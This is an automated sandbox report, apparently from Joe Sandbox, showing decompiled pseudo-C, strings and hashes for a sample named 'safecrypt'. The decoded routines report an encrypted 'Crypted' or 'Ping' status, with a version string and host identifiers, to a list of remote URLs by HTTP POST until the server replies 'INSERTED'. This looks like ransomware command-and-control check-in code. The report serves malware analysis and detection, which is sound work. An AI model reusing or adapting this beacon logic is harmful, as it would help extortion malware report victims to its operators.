                    • Opcode Fuzzy Hash: 2499693c2f1d4a650cf9d5746117cd13102541e94c640f78b828302b5b507357
                    • Instruction Fuzzy Hash: 11C1EC71A00218AFDB24DF65DC49BEE77B8EF99310F1001AAF609E62A0D7745E81CF59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E0041B6A0(intOrPtr _a4, char _a12, long _a20, intOrPtr _a28, intOrPtr _a32, long _a48, char _a260, intOrPtr _a264, intOrPtr _a268, intOrPtr _a272, char _a276, char _a292, intOrPtr _a293, intOrPtr _a297, intOrPtr _a301, intOrPtr _a305, intOrPtr _a309, intOrPtr _a313, intOrPtr _a317, short _a321, char _a323, char _a324, char _a344, long _a345, long _a349, long _a353, char _a356, short _a357, char _a372, char _a373, char _a564, char _a612, char _a628, char _a629, void _a1076, char _a1092, char _a1124, char _a1160, char _a1161, char _a5152, char _a5172, char _a5173, char _a8284, char _a8285, signed int _a12452) {
                    				void* _v0;
                    				intOrPtr _v4;
                    				char** _v12;
                    				void* _v20;
                    				char** _v28;
                    				void* _v36;
                    				intOrPtr _v44;
                    				void _v56;
                    				intOrPtr _v68;
                    				intOrPtr _v72;
                    				long _v80;
                    				char _v100;
                    				char** _v104;
                    				signed int _t96;
                    				char* _t98;
                    				intOrPtr _t99;
                    				intOrPtr _t100;
                    				intOrPtr _t103;
                    				void* _t106;
                    				char* _t111;
                    				intOrPtr _t124;
                    				intOrPtr _t125;
                    				intOrPtr* _t129;
                    				intOrPtr* _t134;
                    				intOrPtr* _t151;
                    				long _t152;
                    				intOrPtr _t159;
                    				char* _t160;
                    				intOrPtr _t168;
                    				intOrPtr _t169;
                    				char _t171;
                    				intOrPtr _t176;
                    				intOrPtr _t179;
                    				intOrPtr _t182;
                    				void* _t190;
                    				intOrPtr* _t191;
                    				intOrPtr _t197;
                    				char* _t199;
                    				intOrPtr _t204;
                    				intOrPtr _t216;
                    				intOrPtr _t218;
                    				char** _t224;
                    				void* _t225;
                    				void* _t227;
                    				long _t231;
                    				char* _t232;
                    				intOrPtr* _t233;
                    				void* _t234;
                    				void* _t236;
                    				signed int _t237;
                    				signed int _t238;
                    				void* _t239;
                    				void* _t240;
                    				void* _t245;
                    				void* _t247;
                    				void* _t255;
                    
                    				_t238 = _t237 & 0xfffffff8;
                    				E0042DFB0(0x30ac);
                    				_t96 =  *0x43d01c; // 0xe0063daa
                    				_a12452 = _t96 ^ _t238;
                    				_t98 =  *0x43fb14; // 0x0
                    				_t168 =  *0x43fe10; // 0x0
                    				_t197 =  *0x43fb10; // 0x0
                    				 *0x480490 = _t98;
                    				_t99 =  *0x43fe14; // 0x0
                    				 *0x480494 = _t168;
                    				_t169 =  *0x43fb0c; // 0x0
                    				 *0x48049c = _t99;
                    				_t100 =  *0x43fe1c; // 0x0
                    				 *0x480498 = _t197;
                    				 *0x4804a0 = _t100;
                    				 *0x4804a4 = _t169;
                    				 *0x4804a8 = _t100;
                    				 *0x4804ac = _t169;
                    				E0040D860(E0040D520(), _t197, 0x43ff40, 0x61);
                    				_a344 = 0;
                    				_a345 = 0;
                    				_a349 = 0;
                    				_a353 = 0;
                    				_a357 = 0;
                    				_t103 = E004112C0(_t101);
                    				_t231 = 1;
                    				_t239 = _t238 + 0xc;
                    				_v4 = _t103;
                    				if( *0x460a7c != 1) {
                    					_a344 = 0x676e6950;
                    				} else {
                    					E00425A43( &_a344, 0xf, "Cr");
                    					E00425D1D( &_a344, 0xf, "ypted");
                    					_t239 = _t239 + 0x18;
                    				}
                    				_a1160 = 0;
                    				E0042C770( &_a1161, 0, 0xfff);
                    				_t240 = _t239 + 0xc;
                    				_t106 = InternetOpenA("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", 0, 0, 0, 0);
                    				_t224 = 0x480490;
                    				_v20 = _t106;
                    				_v12 = 0x480490;
                    				while(1) {
                    					E0042C770( &_v0, 0, 0x3c);
                    					_v0 = 0x3c;
                    					_a20 = _t231;
                    					_a48 = _t231;
                    					_a372 = 0;
                    					E0042C770( &_a373, 0, 0xff);
                    					_a628 = 0;
                    					E0042C770( &_a629, 0, 0x1ff);
                    					_t232 =  *_t224;
                    					_t111 = _t232;
                    					_t240 = _t240 + 0x24;
                    					_t23 =  &(_t111[1]); // 0x2
                    					_t199 = _t23;
                    					do {
                    						_t171 =  *_t111;
                    						_t111 =  &(_t111[1]);
                    					} while (_t171 != 0);
                    					if(InternetCrackUrlA(_t232, _t111 - _t199, 0,  &_v0) == 0) {
                    						L23:
                    						_t224 =  &(_t224[1]);
                    						_v28 = _t224;
                    						if(_t224 < 0x4804a8) {
                    							_t231 = 1;
                    							continue;
                    						}
                    						L24:
                    						InternetCloseHandle(_v36);
                    						if( *0x460a7c == 0) {
                    							E004258B8(_v44);
                    						}
                    						ExitThread(1);
                    					}
                    					_t117 = _a4;
                    					if(_a4 > 0) {
                    						E004262C8( &_a356, 0x100, _v0, _t117);
                    						_t240 = _t240 + 0x10;
                    					}
                    					_t118 = _a32;
                    					if(_a32 > 0) {
                    						E004262C8( &_a612, 0x200, _a28, _t118);
                    						_t240 = _t240 + 0x10;
                    					}
                    					E0042C770( &_a1124, 0, 0x1000);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					_push( *0x43fedd & 0x000000ff);
                    					_push( *0x43fedc & 0x000000ff);
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					_t176 =  *0x43f9fc; // 0x0
                    					_push( *0x43fed8 & 0x000000ff);
                    					_t204 =  *0x4401f4;
                    					_push( *0x460a78);
                    					_t124 =  *0x4401f0;
                    					_push(_t176);
                    					_push("3.0.0a");
                    					_push(0);
                    					_push(0x400);
                    					_push(_t204);
                    					_push(_t124);
                    					L00430286();
                    					_push(0);
                    					_push(0x400);
                    					_push(_t204);
                    					_push(_t124);
                    					L00430286();
                    					_push(_t204);
                    					_push(_t124);
                    					_t125 =  *0x43f9dc; // 0x0
                    					_push(0x43ff10);
                    					_push(_v72);
                    					E0041BC10(0x1000,  &_a1092, _t125,  &_a276);
                    					_a8284 = 0;
                    					E0042C770( &_a8285, 0, 0xfff);
                    					_t233 =  *0x43fe18; // 0x0
                    					_t245 = _t240 + 0x60;
                    					_a293 = 0;
                    					_a297 = 0;
                    					_a301 = 0;
                    					_a305 = 0;
                    					_a309 = 0;
                    					_a313 = 0;
                    					_a317 = 0;
                    					_a321 = 0;
                    					_a323 = 0;
                    					_t129 = _t233;
                    					_a292 = 0;
                    					_t47 = _t129 + 1; // 0x1
                    					_t225 = _t47;
                    					do {
                    						_t179 =  *_t129;
                    						_t129 = _t129 + 1;
                    					} while (_t179 != 0);
                    					E00420970(0, _t233,  &_a292, _t129 - _t225);
                    					_push( &_a12);
                    					_push( &_a292);
                    					_a260 = 0xaaaaffff;
                    					_a264 = 0xefbe0000;
                    					_a268 = 0xadde;
                    					_a272 = 0xffffffbe;
                    					E00424020();
                    					_t134 =  &_a1092;
                    					_t247 = _t245 + 0xc;
                    					_t234 = _t134 + 1;
                    					do {
                    						_t182 =  *_t134;
                    						_t134 = _t134 + 1;
                    						_t264 = _t182;
                    					} while (_t182 != 0);
                    					_t183 = _t134 - _t234;
                    					E0042C770(_t247 + _t134 - _t234 + 0x4a1, 0x10, 0x10);
                    					_push( &_a12);
                    					_push( &_a260);
                    					_push( &_a1092);
                    					E0041BF80(_t134 - _t234 + 0x10 - (_t183 + 0x00000001 & 0x0000000f) + 1,  &_a8284);
                    					E0041BC10(0x1000,  &_a1092, "data=%s", E0041B640( &_a8284, _t134 - _t234 + 0x10 - (_t183 + 0x00000001 & 0x0000000f) + 1, _t264,  &_a8284));
                    					E004258B8(_t142);
                    					_t236 = E0041BC30( &_a324, _v68);
                    					_v56 = 0x124f80;
                    					InternetSetOptionA(_t236, 6,  &_v56, 4);
                    					GetLastError();
                    					_t227 = E0041BD40( &_a564, _t236);
                    					_a5172 = 0;
                    					E0042C770( &_a5173, 0, 0xc17);
                    					_t151 =  &_a1076;
                    					_t240 = _t247 + 0x40;
                    					_v80 = 0;
                    					_t190 = _t151 + 1;
                    					do {
                    						_t216 =  *_t151;
                    						_t151 = _t151 + 1;
                    					} while (_t216 != 0);
                    					_t152 = _t151 - _t190;
                    					_t191 = "Content-Type: application/x-www-form-urlencoded";
                    					_v68 = _t191 + 1;
                    					do {
                    						_t218 =  *_t191;
                    						_t191 = _t191 + 1;
                    					} while (_t218 != 0);
                    					HttpSendRequestA(_t227, "Content-Type: application/x-www-form-urlencoded", _t191 - _v68,  &_a1076, _t152);
                    					if(GetLastError() != 0) {
                    						L22:
                    						InternetCloseHandle(_t227);
                    						InternetCloseHandle(_t236);
                    						_t224 = _v104;
                    						goto L23;
                    					}
                    					E0041BE60( &_a5152,  &_v100, _t227);
                    					_t159 = _v100;
                    					_t255 = _t240 + 4;
                    					 *((char*)(_t255 + _t159 + 0x149c)) = 0;
                    					 *((char*)(_t255 + _t159 + 0x14a1)) = 0;
                    					_t160 = strstr( &_a5152, "INSERTED");
                    					_t240 = _t255 + 8;
                    					if(_t160 != 0) {
                    						goto L24;
                    					}
                    					goto L22;
                    				}
                    			}



























































                    0x0041b6a3
                    0x0041b6ab
                    0x0041b6b0
                    0x0041b6b7
                    0x0041b6be
                    0x0041b6c3
                    0x0041b6c9
                    0x0041b6cf
                    0x0041b6d4
                    0x0041b6da
                    0x0041b6e0
                    0x0041b6e6
                    0x0041b6eb
                    0x0041b6f2
                    0x0041b6f8
                    0x0041b6fd
                    0x0041b703
                    0x0041b708
                    0x0041b71c
                    0x0041b724
                    0x0041b72b
                    0x0041b732
                    0x0041b739
                    0x0041b740
                    0x0041b748
                    0x0041b74d
                    0x0041b752
                    0x0041b755
                    0x0041b75f
                    0x0041b791
                    0x0041b761
                    0x0041b770
                    0x0041b787
                    0x0041b78c
                    0x0041b78c
                    0x0041b7aa
                    0x0041b7b1
                    0x0041b7b6
                    0x0041b7c2
                    0x0041b7c8
                    0x0041b7cd
                    0x0041b7d1
                    0x0041b7e5
                    0x0041b7ed
                    0x0041b803
                    0x0041b80b
                    0x0041b80f
                    0x0041b813
                    0x0041b81a
                    0x0041b830
                    0x0041b837
                    0x0041b83c
                    0x0041b83e
                    0x0041b840
                    0x0041b843
                    0x0041b843
                    0x0041b846
                    0x0041b846
                    0x0041b848
                    0x0041b849
                    0x0041b85f
                    0x0041bbd0
                    0x0041bbd0
                    0x0041bbd3
                    0x0041bbdd
                    0x0041b7e0
                    0x00000000
                    0x0041b7e0
                    0x0041bbe3
                    0x0041bbe8
                    0x0041bbf4
                    0x0041bbfb
                    0x0041bc00
                    0x0041bc05
                    0x0041bc05
                    0x0041b865
                    0x0041b86b
                    0x0041b880
                    0x0041b885
                    0x0041b885
                    0x0041b888
                    0x0041b88e
                    0x0041b8a3
                    0x0041b8a8
                    0x0041b8a8
                    0x0041b8b9
                    0x0041b8d6
                    0x0041b8de
                    0x0041b8e6
                    0x0041b8ee
                    0x0041b8f6
                    0x0041b8fe
                    0x0041b904
                    0x0041b905
                    0x0041b90b
                    0x0041b90c
                    0x0041b912
                    0x0041b913
                    0x0041b918
                    0x0041b919
                    0x0041b91e
                    0x0041b91f
                    0x0041b924
                    0x0041b925
                    0x0041b926
                    0x0041b92b
                    0x0041b92c
                    0x0041b931
                    0x0041b932
                    0x0041b933
                    0x0041b93c
                    0x0041b93d
                    0x0041b93e
                    0x0041b943
                    0x0041b948
                    0x0041b95f
                    0x0041b972
                    0x0041b979
                    0x0041b97e
                    0x0041b984
                    0x0041b989
                    0x0041b990
                    0x0041b997
                    0x0041b99e
                    0x0041b9a5
                    0x0041b9ac
                    0x0041b9b3
                    0x0041b9ba
                    0x0041b9c2
                    0x0041b9c9
                    0x0041b9cb
                    0x0041b9d2
                    0x0041b9d2
                    0x0041b9d5
                    0x0041b9d5
                    0x0041b9d7
                    0x0041b9d8
                    0x0041b9e8
                    0x0041b9f4
                    0x0041b9fc
                    0x0041b9fd
                    0x0041ba08
                    0x0041ba13
                    0x0041ba1e
                    0x0041ba29
                    0x0041ba2e
                    0x0041ba35
                    0x0041ba38
                    0x0041ba40
                    0x0041ba40
                    0x0041ba42
                    0x0041ba43
                    0x0041ba43
                    0x0041ba49
                    0x0041ba66
                    0x0041ba72
                    0x0041ba7a
                    0x0041ba82
                    0x0041ba8c
                    0x0041bab9
                    0x0041bac2
                    0x0041bae5
                    0x0041baea
                    0x0041baf2
                    0x0041baf8
                    0x0041bb1c
                    0x0041bb1e
                    0x0041bb25
                    0x0041bb2a
                    0x0041bb31
                    0x0041bb34
                    0x0041bb38
                    0x0041bb40
                    0x0041bb40
                    0x0041bb42
                    0x0041bb43
                    0x0041bb47
                    0x0041bb49
                    0x0041bb51
                    0x0041bb55
                    0x0041bb55
                    0x0041bb57
                    0x0041bb58
                    0x0041bb70
                    0x0041bb7e
                    0x0041bbc0
                    0x0041bbc7
                    0x0041bbca
                    0x0041bbcc
                    0x00000000
                    0x0041bbcc
                    0x0041bb8c
                    0x0041bb91
                    0x0041bb95
                    0x0041bba4
                    0x0041bbac
                    0x0041bbb3
                    0x0041bbb9
                    0x0041bbbe
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041bbbe

                    APIs
                    • _strcpy_s.LIBCMT ref: 0041B770
                    • _strcat_s.LIBCMT ref: 0041B787
                    • _memset.LIBCMT ref: 0041B7B1
                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 0041B7C2
                    • _memset.LIBCMT ref: 0041B7ED
                    • _memset.LIBCMT ref: 0041B81A
                    • _memset.LIBCMT ref: 0041B837
                    • InternetCrackUrlA.WININET(00000001,00000002,00000000,?), ref: 0041B857
                    • _memset.LIBCMT ref: 0041B8B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$Internet$CrackOpen_strcat_s_strcpy_s
                    • String ID: 3.0.0a$95|F$<$Content-Type: application/x-www-form-urlencoded$INSERTED$Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko$Ping$data=%s$ypted
                    • API String ID: 1420483615-2821691159
                    • Opcode ID: ed3d76b9697e03cb9849d010e63daf4abb5f73007e641d651afa5eabb1c18dbc
                    • Instruction ID: 50ef56a0b56dee79df213e3b543a99367f227d0aacd31190f582176d8807bc1c
                    • Opcode Fuzzy Hash: ed3d76b9697e03cb9849d010e63daf4abb5f73007e641d651afa5eabb1c18dbc
                    • Instruction Fuzzy Hash: 71D1B5B1548340AFD320DB25EC45AEBB7E9AF89704F44493EF189C7262E7745508CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0041B7D7(char** _a8, void* _a36, intOrPtr _a40, char _a48, long _a56, intOrPtr _a64, intOrPtr _a68, long _a84, char _a296, intOrPtr _a300, intOrPtr _a304, intOrPtr _a308, char _a312, long _a328, char _a329, char _a333, char _a337, char _a341, char _a345, char _a349, char _a353, short _a357, char _a359, char _a360, char _a392, long _a408, char _a409, char _a600, char _a648, long _a664, char _a665, void _a1112, char _a1128, char _a1160, char _a5188, long _a5208, char _a5209, long _a8320, char _a8321) {
                    				void* _v0;
                    				intOrPtr _v8;
                    				void _v20;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				long _v44;
                    				char _v64;
                    				char** _v68;
                    				char* _t84;
                    				intOrPtr _t97;
                    				intOrPtr _t98;
                    				intOrPtr* _t102;
                    				intOrPtr* _t107;
                    				intOrPtr* _t124;
                    				long _t125;
                    				intOrPtr _t132;
                    				char* _t133;
                    				long _t137;
                    				char _t139;
                    				intOrPtr _t144;
                    				intOrPtr _t147;
                    				intOrPtr _t150;
                    				void* _t158;
                    				intOrPtr* _t159;
                    				char* _t165;
                    				intOrPtr _t170;
                    				intOrPtr _t182;
                    				intOrPtr _t184;
                    				char** _t188;
                    				void* _t189;
                    				void* _t191;
                    				char* _t194;
                    				intOrPtr* _t195;
                    				void* _t196;
                    				void* _t198;
                    				void* _t199;
                    				void* _t204;
                    				void* _t206;
                    				void* _t214;
                    
                    				do {
                    					E0042C770( &_a36, _t137, 0x3c);
                    					_a36 = 0x3c;
                    					_a56 = 1;
                    					_a84 = 1;
                    					_a408 = _t137;
                    					E0042C770( &_a409, _t137, 0xff);
                    					_a664 = _t137;
                    					E0042C770( &_a665, _t137, 0x1ff);
                    					_t194 =  *_t188;
                    					_t84 = _t194;
                    					_t199 = _t199 + 0x24;
                    					_t9 =  &(_t84[1]); // 0x2
                    					_t165 = _t9;
                    					do {
                    						_t139 =  *_t84;
                    						_t84 =  &(_t84[1]);
                    					} while (_t139 != _t137);
                    					if(InternetCrackUrlA(_t194, _t84 - _t165, _t137,  &_a36) == 0) {
                    						goto L20;
                    					}
                    					_t90 = _a40;
                    					if(_a40 > _t137) {
                    						E004262C8( &_a392, 0x100, _a36, _t90);
                    						_t199 = _t199 + 0x10;
                    					}
                    					_t91 = _a68;
                    					if(_a68 > _t137) {
                    						E004262C8( &_a648, 0x200, _a64, _t91);
                    						_t199 = _t199 + 0x10;
                    					}
                    					E0042C770( &_a1160, _t137, 0x1000);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					_push( *0x43fedd & 0x000000ff);
                    					_push( *0x43fedc & 0x000000ff);
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					_t144 =  *0x43f9fc; // 0x0
                    					_push( *0x43fed8 & 0x000000ff);
                    					_t170 =  *0x4401f4;
                    					_push( *0x460a78);
                    					_t97 =  *0x4401f0;
                    					_push(_t144);
                    					_push("3.0.0a");
                    					_push(_t137);
                    					_push(0x400);
                    					_push(_t170);
                    					_push(_t97);
                    					L00430286();
                    					_push(_t137);
                    					_push(0x400);
                    					_push(_t170);
                    					_push(_t97);
                    					L00430286();
                    					_push(_t170);
                    					_push(_t97);
                    					_t98 =  *0x43f9dc; // 0x0
                    					_push(0x43ff10);
                    					_push(_v36);
                    					E0041BC10(0x1000,  &_a1128, _t98,  &_a312);
                    					_a8320 = _t137;
                    					E0042C770( &_a8321, _t137, 0xfff);
                    					_t195 =  *0x43fe18; // 0x0
                    					_t204 = _t199 + 0x60;
                    					_a329 = 0;
                    					_a333 = 0;
                    					_a337 = 0;
                    					_a341 = 0;
                    					_a345 = 0;
                    					_a349 = 0;
                    					_a353 = 0;
                    					_a357 = 0;
                    					_a359 = 0;
                    					_t102 = _t195;
                    					_a328 = _t137;
                    					_t33 = _t102 + 1; // 0x1
                    					_t189 = _t33;
                    					do {
                    						_t147 =  *_t102;
                    						_t102 = _t102 + 1;
                    					} while (_t147 != _t137);
                    					E00420970(_t137, _t195,  &_a328, _t102 - _t189);
                    					_push( &_a48);
                    					_push( &_a328);
                    					_a296 = 0xaaaaffff;
                    					_a300 = 0xefbe0000;
                    					_a304 = 0xadde;
                    					_a308 = 0xffffffbe;
                    					E00424020();
                    					_t107 =  &_a1128;
                    					_t206 = _t204 + 0xc;
                    					_t196 = _t107 + 1;
                    					do {
                    						_t150 =  *_t107;
                    						_t107 = _t107 + 1;
                    						_t221 = _t150 - _t137;
                    					} while (_t150 != _t137);
                    					_t151 = _t107 - _t196;
                    					E0042C770(_t206 + _t107 - _t196 + 0x4a1, 0x10, 0x10);
                    					_push( &_a48);
                    					_push( &_a296);
                    					_push( &_a1128);
                    					E0041BF80(_t107 - _t196 + 0x10 - (_t151 + 0x00000001 & 0x0000000f) + 1,  &_a8320);
                    					E0041BC10(0x1000,  &_a1128, "data=%s", E0041B640( &_a8320, _t107 - _t196 + 0x10 - (_t151 + 0x00000001 & 0x0000000f) + 1, _t221,  &_a8320));
                    					E004258B8(_t115);
                    					_t198 = E0041BC30( &_a360, _v32);
                    					_v20 = 0x124f80;
                    					InternetSetOptionA(_t198, 6,  &_v20, 4);
                    					GetLastError();
                    					_t191 = E0041BD40( &_a600, _t198);
                    					_a5208 = _t137;
                    					E0042C770( &_a5209, _t137, 0xc17);
                    					_t124 =  &_a1112;
                    					_t199 = _t206 + 0x40;
                    					_v44 = _t137;
                    					_t158 = _t124 + 1;
                    					do {
                    						_t182 =  *_t124;
                    						_t124 = _t124 + 1;
                    					} while (_t182 != _t137);
                    					_t125 = _t124 - _t158;
                    					_t159 = "Content-Type: application/x-www-form-urlencoded";
                    					_v32 = _t159 + 1;
                    					do {
                    						_t184 =  *_t159;
                    						_t159 = _t159 + 1;
                    					} while (_t184 != _t137);
                    					HttpSendRequestA(_t191, "Content-Type: application/x-www-form-urlencoded", _t159 - _v32,  &_a1112, _t125);
                    					if(GetLastError() != 0) {
                    						L19:
                    						InternetCloseHandle(_t191);
                    						InternetCloseHandle(_t198);
                    						_t188 = _v68;
                    						goto L20;
                    					}
                    					E0041BE60( &_a5188,  &_v64, _t191);
                    					_t132 = _v64;
                    					_t214 = _t199 + 4;
                    					 *(_t214 + _t132 + 0x149c) = _t137;
                    					 *(_t214 + _t132 + 0x14a1) = _t137;
                    					_t133 = strstr( &_a5188, "INSERTED");
                    					_t199 = _t214 + 8;
                    					if(_t133 != 0) {
                    						break;
                    					}
                    					goto L19;
                    					L20:
                    					_t188 =  &(_t188[1]);
                    					_a8 = _t188;
                    				} while (_t188 < 0x4804a8);
                    				InternetCloseHandle(_v0);
                    				if( *0x460a7c == _t137) {
                    					E004258B8(_v8);
                    				}
                    				ExitThread(1);
                    			}










































                    0x0041b7e0
                    0x0041b7ed
                    0x0041b803
                    0x0041b80b
                    0x0041b80f
                    0x0041b813
                    0x0041b81a
                    0x0041b830
                    0x0041b837
                    0x0041b83c
                    0x0041b83e
                    0x0041b840
                    0x0041b843
                    0x0041b843
                    0x0041b846
                    0x0041b846
                    0x0041b848
                    0x0041b849
                    0x0041b85f
                    0x00000000
                    0x00000000
                    0x0041b865
                    0x0041b86b
                    0x0041b880
                    0x0041b885
                    0x0041b885
                    0x0041b888
                    0x0041b88e
                    0x0041b8a3
                    0x0041b8a8
                    0x0041b8a8
                    0x0041b8b9
                    0x0041b8d6
                    0x0041b8de
                    0x0041b8e6
                    0x0041b8ee
                    0x0041b8f6
                    0x0041b8fe
                    0x0041b904
                    0x0041b905
                    0x0041b90b
                    0x0041b90c
                    0x0041b912
                    0x0041b913
                    0x0041b918
                    0x0041b919
                    0x0041b91e
                    0x0041b91f
                    0x0041b924
                    0x0041b925
                    0x0041b926
                    0x0041b92b
                    0x0041b92c
                    0x0041b931
                    0x0041b932
                    0x0041b933
                    0x0041b93c
                    0x0041b93d
                    0x0041b93e
                    0x0041b943
                    0x0041b948
                    0x0041b95f
                    0x0041b972
                    0x0041b979
                    0x0041b97e
                    0x0041b984
                    0x0041b989
                    0x0041b990
                    0x0041b997
                    0x0041b99e
                    0x0041b9a5
                    0x0041b9ac
                    0x0041b9b3
                    0x0041b9ba
                    0x0041b9c2
                    0x0041b9c9
                    0x0041b9cb
                    0x0041b9d2
                    0x0041b9d2
                    0x0041b9d5
                    0x0041b9d5
                    0x0041b9d7
                    0x0041b9d8
                    0x0041b9e8
                    0x0041b9f4
                    0x0041b9fc
                    0x0041b9fd
                    0x0041ba08
                    0x0041ba13
                    0x0041ba1e
                    0x0041ba29
                    0x0041ba2e
                    0x0041ba35
                    0x0041ba38
                    0x0041ba40
                    0x0041ba40
                    0x0041ba42
                    0x0041ba43
                    0x0041ba43
                    0x0041ba49
                    0x0041ba66
                    0x0041ba72
                    0x0041ba7a
                    0x0041ba82
                    0x0041ba8c
                    0x0041bab9
                    0x0041bac2
                    0x0041bae5
                    0x0041baea
                    0x0041baf2
                    0x0041baf8
                    0x0041bb1c
                    0x0041bb1e
                    0x0041bb25
                    0x0041bb2a
                    0x0041bb31
                    0x0041bb34
                    0x0041bb38
                    0x0041bb40
                    0x0041bb40
                    0x0041bb42
                    0x0041bb43
                    0x0041bb47
                    0x0041bb49
                    0x0041bb51
                    0x0041bb55
                    0x0041bb55
                    0x0041bb57
                    0x0041bb58
                    0x0041bb70
                    0x0041bb7e
                    0x0041bbc0
                    0x0041bbc7
                    0x0041bbca
                    0x0041bbcc
                    0x00000000
                    0x0041bbcc
                    0x0041bb8c
                    0x0041bb91
                    0x0041bb95
                    0x0041bba4
                    0x0041bbac
                    0x0041bbb3
                    0x0041bbb9
                    0x0041bbbe
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0041bbd0
                    0x0041bbd0
                    0x0041bbd3
                    0x0041bbd7
                    0x0041bbe8
                    0x0041bbf4
                    0x0041bbfb
                    0x0041bc00
                    0x0041bc05

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000001.00000001.325663024.0000000000482000.00000040.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_1_400000_safecrypt.jbxd
                    Yara matches
                    Similarity
                    • API ID: _memset$Internet_alldiv$CrackErrorLastOption_free
                    • String ID: 3.0.0a$<$Content-Type: application/x-www-form-urlencoded$INSERTED$data=%s
                    • API String ID: 1765502259-451914084
                    • Opcode ID: ee516dea520953f8b43f163470cef75af014bb40e6b9b91f6e021b7e200cf844
                    • Instruction ID: 4e84a7fa781297a5c87a2b60a6cb7ac9c42528fe1f2e410d640f63fe350b517e
                    • Opcode Fuzzy Hash: ee516dea520953f8b43f163470cef75af014bb40e6b9b91f6e021b7e200cf844
                    • Instruction Fuzzy Hash: BAB1A5B1508384AFD320DB64EC55EEB77E9AFC9304F44492EF189C7252E7749508CBAA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 75%
                    			E0041B7D9(char** _a8, void* _a36, intOrPtr _a40, char _a48, long _a56, intOrPtr _a64, intOrPtr _a68, long _a84, char _a296, intOrPtr _a300, intOrPtr _a304, intOrPtr _a308, char _a312, long _a328, char _a329, char _a333, char _a337, char _a341, char _a345, char _a349, char _a353, short _a357, char _a359, char _a360, char _a392, long _a408, char _a409, char _a600, char _a648, long _a664, char _a665, void _a1112, char _a1128, char _a1160, char _a5188, long _a5208, char _a5209, long _a8320, char _a8321) {
                    				void* _v0;
                    				intOrPtr _v8;
                    				void _v20;
                    				intOrPtr _v32;
                    				intOrPtr _v36;
                    				long _v44;
                    				char _v64;
                    				char** _v68;
                    				char* _t84;
                    				intOrPtr _t97;
                    				intOrPtr _t98;
                    				intOrPtr* _t102;
                    				intOrPtr* _t107;
                    				intOrPtr* _t124;
                    				long _t125;
                    				intOrPtr _t132;
                    				char* _t133;
                    				long _t137;
                    				char _t139;
                    				intOrPtr _t144;
                    				intOrPtr _t147;
                    				intOrPtr _t150;
                    				void* _t158;
                    				intOrPtr* _t159;
                    				char* _t165;
                    				intOrPtr _t170;
                    				intOrPtr _t182;
                    				intOrPtr _t184;
                    				char** _t188;
                    				char** _t189;
                    				void* _t190;
                    				void* _t192;
                    				char* _t195;
                    				intOrPtr* _t196;
                    				void* _t197;
                    				void* _t199;
                    				void* _t200;
                    				void* _t203;
                    				void* _t206;
                    				void* _t208;
                    				void* _t216;
                    
                    				do {
                    					E0042C770( &_a36, _t137, 0x3c);
                    					_a36 = 0x3c;
                    					_a56 = 1;
                    					_a84 = 1;
                    					_a408 = _t137;
                    					E0042C770( &_a409, _t137, 0xff);
                    					_a664 = _t137;
                    					E0042C770( &_a665, _t137, 0x1ff);
                    					_t195 =  *_t188;
                    					_t84 = _t195;
                    					_t203 = _t200 + 0x24;
                    					_t9 =  &(_t84[1]); // 0x2
                    					_t165 = _t9;
                    					do {
                    						_t139 =  *_t84;
                    						_t84 =  &(_t84[1]);
                    					} while (_t139 != _t137);
                    					if(InternetCrackUrlA(_t195, _t84 - _t165, _t137,  &_a36) == 0) {
                    						goto L20;
                    					}
                    					_t90 = _a40;
                    					if(_a40 > _t137) {
                    						E004262C8( &_a392, 0x100, _a36, _t90);
                    						_t203 = _t203 + 0x10;
                    					}
                    					_t91 = _a68;
                    					if(_a68 > _t137) {
                    						E004262C8( &_a648, 0x200, _a64, _t91);
                    						_t203 = _t203 + 0x10;
                    					}
                    					E0042C770( &_a1160, _t137, 0x1000);
                    					_push( *0x43fedf & 0x000000ff);
                    					_push( *0x43fede & 0x000000ff);
                    					_push( *0x43fedd & 0x000000ff);
                    					_push( *0x43fedc & 0x000000ff);
                    					_push( *0x43fedb & 0x000000ff);
                    					_push( *0x43feda & 0x000000ff);
                    					_push( *0x43fed9 & 0x000000ff);
                    					_t144 =  *0x43f9fc; // 0x0
                    					_push( *0x43fed8 & 0x000000ff);
                    					_t170 =  *0x4401f4;
                    					_push( *0x460a78);
                    					_t97 =  *0x4401f0;
                    					_push(_t144);
                    					_push("3.0.0a");
                    					_push(_t137);
                    					_push(0x400);
                    					_push(_t170);
                    					_push(_t97);
                    					L00430286();
                    					_push(_t137);
                    					_push(0x400);
                    					_push(_t170);
                    					_push(_t97);
                    					L00430286();
                    					_push(_t170);
                    					_push(_t97);
                    					_t98 =  *0x43f9dc; // 0x0
                    					_push(0x43ff10);
                    					_push(_v36);
                    					E0041BC10(0x1000,  &_a1128, _t98,  &_a312);
                    					_a8320 = _t137;
                    					E0042C770( &_a8321, _t137, 0xfff);
